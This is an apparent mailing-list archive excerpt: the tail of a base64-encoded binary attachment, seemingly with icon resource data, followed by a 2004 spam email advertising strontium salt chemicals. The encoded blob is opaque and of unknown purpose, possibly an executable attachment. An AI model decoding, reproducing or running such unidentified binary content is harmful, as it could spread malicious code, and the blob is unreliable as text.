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 IAAAgA4AAABAAACAAAAAAAAAAAAAAAAAAAACAAEAAABYAACAAgAAAHAAAIAAAAAAAAAAAAAA AAAAAAEAZQAAAIgAAIAAAAAAAAAAAAAAAAAAAAEABwQAAKAAAAAAAAAAAAAAAAAAAAAAAAEA BwQAALAAAAAAAAAAAAAAAAAAAAAAAAEABwQAAMAAAADQkAEA6AIAAAAAAAAAAAAAuJMBACgB AAAAAAAAAAAAAOCUAQAiAAAAAAAAAAAAAAAoAAAAIAAAAEAAAAABAAQAAAAAAIACAAAAAAAA AAAAAAAAAAAAAAAAzP//AGhXWAAAAAAAgICAAP///wDAwMAA/wAAAAD//wC/AAAAAAD/AAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAACIhEiIiIiIiIiIiIiIiIiIiITVVVVVVVVVVVVVVJSIi IiNERERERERERERERFJSIiIjREREREREVVRERVVSUiIiI0SIiIhESZlERJmUUlIiIiNERERE RESVRERJVFJSIiIjRIiIiIhESVVVWVRSUiIiI0RERERERESZmZlUUlIiIiNEiIiIiIhESVRJ VFJSIiIjRERERERERESVSVRSUiIiI0SIiIiIiIhESVlUUlIiIiNERERERERERESZVFJSIiIj RIiIiIiIiIhESURSUiIiI0REREREREREREREUlIiIiNEiIiIiIiIiIiIRFJSIiIjRERERERE RERERERSUiIiI0SIiIiIiIiIiIhEUlIiIiNERERERERERERERFJSIiIjRCIiIiJEiIiIiERS UiIiI0Q5kkRCREREREREUlIiIiNEMiIiIkSIiIiIRFJSIiIjRDRCd3JERERERERSUiIiI0Qy IndyRIiIiIhEUlIiIiNENEJ3ckRERERERFJSIiIjRDRCZmJERERERERSUiIiI0Q0QmZiRERE REREUlIiIiNEMzIiIkRERERERFJSIiIjRERERERERERERERSUiIiI0JEJEJEJEJEJEJEMlIi IiNCRCRCRCRCRCRCRDJSIiIiJDNDNDNDNDNDNDNDIiIiIiIiIiIiIiIiIiIiIiIi4AAAD+AA AAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH 4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AA AAfgAAAH+AAAD/////8oAAAAEAAAACAAAAABAAQAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAgAAAgAAAAICAAIAAAACAAIAAgIAAAMDAwACAgIAAAAD/AAD/AAAA//8A/wAAAP8A /wD//wAA////AAAAAAAAAAAAAHd3d3d3cAAA//+f/59wAAD//3mZn3AAAPRE95+fcAAA//// eZ9wAAD0RET3n3AAAP//////cAAA9ERERE9wAAD//////3AAAPRERERPcAAA//////9wAAD/ /////3AAAPDw8PDw8AAAD4+Pj4+AAAAAAAAAAAAAwAcAAMADAADAAwAAwAMAAMADAADAAwAA wAMAAMADAADAAwAAwAMAAMADAADAAwAAwAMAAMADAADABwAA6q8AAAAAAQACACAgEAABAAQA 6AIAAAEAEBAQAAEABAAoAQAAAgAAAAAAAAD/ ------=_NextPart_000_0009_0000133F.000042A1-- From chemical-market at 163.com Tue Mar 9 14:05:34 2004 From: chemical-market at 163.com (Mr.Wang) Date: Tue, 09 Mar 2004 11:05:34 +0800 Subject: Chemical products : Sr Salt Chemical series Message-ID: <20040319153538.54EFC27C187@shitei.mindrot.org> Chemical products : STRONTIUM HYDROXIDE OCTAHYDRATEM > > > Chongqing Xianfeng Sr Salt Chemical Co., Ltd.-- > a Sino-Japan joint venture established in 1995, is engaged in developing, manufacturing and trading of strontium salt products. Enjoying self import and export right, preferential policy for foreign-invested venture, advantage in production scale, technology and production structure, the company acts as an important manufacturer and distributor of Sr salt in the country. Its chemical factory is located at the foot of the beautiful Bayue Mountain, occupying 2.33 hectare, with annual output of strontium carbonate 4500t, and 3000t of strontium nitrate, strontium hydroxide, strontium chloride, strontium sulfate, strontium ethanoic, etc. The factory owns total quality control(TQC) system, strict administration and qualified technical team. Products produced with high technology is of good quality. For example, strontium carbonate has low contents of sulfur and calcium; strontium nitrate, strontium chloride and strontium hydroxide have low contents of Ba, Na and Ca. > > strontium salt > > 1. STRONTIUM HYDROXIDE OCTAHYDRATEMolecular formula: Sr(OH)2.8H2O97% Min.Properties: cubic crystal without color, the relative density is 1.90, be the substances when been heated to 100c.Use: separate cane sugar from gooey, refine of beet sugar, to make strontium salt, develop the dryness Properties of oil and oil paint. > > 2. STRONTIUM OXALATEmolecular formula : SrC2O4 .H2O99% Min.Properties: white crystal powder, lose crystal water when heated to 150c,dissolved in muriatic acid and nitric acid.Use: to make strontium salt.Packing: 25KG net plastic woven bags or as requested. > > 3. STRONTIUM ATETATmolecular formula : Sr(CH3COO)2.1/2H2O99.0% Min.molecular weightProperties: white crystal powder. Losecrystal water when heated to 150c,charcoaled under high temperature. Change to carbonic acid strontium after heated. dissolved in water, the water liquid is neuteal micro dissolved in ethanol .use: used in analysis reagent and medicine.Packing: 25KG net plastic woven bags or as requested. > > 4.STRONTIUM FLUORIDEmolecular formula : SrF2Properties: white powder, dissolved in 8500 times water, micro dissolved in muriatic acid ,cannot dissolved in hydrofluoric acid and propyliodone.Use: used in making medicine to substitute other fluorid. Packing: 25KG net plastic woven bags or as requested. > > 5.STRONTIUM CARBONATE HIGH PURITYProperties: white powder, dissolved in rare muriatic acid and rare nitric acid and give out CO2,micro dissolved in water contain CO2 and ammonia salt liquor, cannot dissolved in water. decompose to CO2 and oxidation strontium when heated to 900c.Use: electron component, skyrocket material, to make rainbow glass, and other strontium salt preparation > 6.STRONTIUM CHROMATEProperties: yellow crystal or powder. dissolved in muriatic acid ,nitric acid ,acetic acid and ammonia, micro dissolved in water. be oxidative, be poison.Use: oxidant, glass, ceramic industry.Packing: 25KG net plastic woven bags or as requested. > > 7.STRONTIUM PEROXIDEProperties: white or canary powder , cannot dissolved in water, dissolved in rare acid and create hydrogen peroxide.Use: used in the mixture of fireworks.packing: 25KG net plastic woven bags or as requested. > > 8.STRONTIUM CARBONATE IN GRANULARProperties: white powder, dissolved in rare muriatic acid and rare nitric acid and give out CO2,micro dissolved in water contain CO2 and ammonia salt liquor, cannot dissolved in water Decompose to CO2 and oxidation strontium when heated to 900c.Use: electron component, skyrocket material, to make rainbow glass, and other strontium salt preparation.Molecular formula : SrCO3 +BaCO3 98.0% MIN.Packing: 1000KG flexible container bag or as requested.1>Properties: similar to strontium carbonate powder 2>Uses: similar to strontium carbonate powder3>Specifications: SrCO3 + BaCO3 98%min 4>Packing: 1000kg bag > > 9.STRONTIUM HYDRATE PHOSPHATEmolecular formula : SrHPO4 99% Min molecular weight: 183.62Properties: white powder, dissolved in muriatic acid and nitric acid and cannot dissolved in water and alcohol ketone.Use: used in medicine industry and analysis reagent, can be used to shine material .packing: 25KG net plastic woven bags or as requested > > 10.STRONTIUM PHOSPHATEmolecular formula : Sr3(PO4)2Properties: white powder, dissolved in 1536c,cannot dissolved in water ,dissolved in muriatic acid and nitric acid.Use: used in electron industry and medicine industry.packing : 25KG net plastic woven bags or as requested > > 11.STRONTIUM SALFATEB 99% MIN.C 97% MIN.Use: white crystal powder, rare dissolved in dense acid, rare dissolved in water ,cannot dissolved in alcohol and rare vitriolUse: analysis reagent ,the saturation liquor mensurate barium, red flame. > > 12.STRONTIUM CHLORIDE HEXAHYDRATE? common hexahydrate chloridize strontium(SrCl2.6H2O 99.0% Min.)Properties: white pin shape crystal. taste bitter, airslake in dry wind, deliquescence in wet air. dissolved in water ,rare dissolved in ethanol and acet. lose 4 molecule crystal water when heated to 61.4c,to be monohydrate salt on 100c.melting point:115c.dampproof,airproof saved.Use: medicine industry ,domestic industry, strontium salt preparation.Packing: 25KG net plastic woven bags or as requested. ? high pure hexahydrate chloridize strontiumPacking: 25KG net plastic woven bags or as requested.(SrCl2.6H2O 99.0 ~ 103.0% > > 13.STRONTIUM TETRABORATEmolecular formula : SrB4O7 99% Min. Properties: white powder, cannot dissolved in water, dissolved in muriatic acid and nitric acid.Use: in porcelain enamel industry and glass industry. > > 14. STRONTIUM CARBONATE POWDERProperties: white powder, dissolved in rare muriatic acid and rare nitric acid and give out CO2, micro dissolved in water contain CO2 and ammonia salt liquor, cannot dissolved in water.decompose to CO2 and oxidation strontium when heated to 900c.Use: electron component, skyrocket material, to make rainbow glass, and other strontium salt preparation.? carbonic acid strontium in powder.(SrCO3 97.5% Min.)Packing: Plastic woven bag of net 25KG or as requested. ? carbonic acid strontium in powder.(SrCO3 98% Min.)Packing: Plastic woven bag of net 25KG or as requested. ? carbonic acid strontium in powder.(SrCO3 98.5% MIN.)Packing: Plastic woven bag of net 25KG or as requested. > > 15.STRONTIUM NITRATEProperties: white grain or powder. dissolved in water, rare dissolved in ethanol. Oxidation. Mixed with organics will self-ignite and explode. Use: fireworks .Communication signal in sea and on land. match.? nitric acid strontium I type(SR(NO3)2 99% Min.)Packing: 25KG net plastic woven bags or as requested. ? 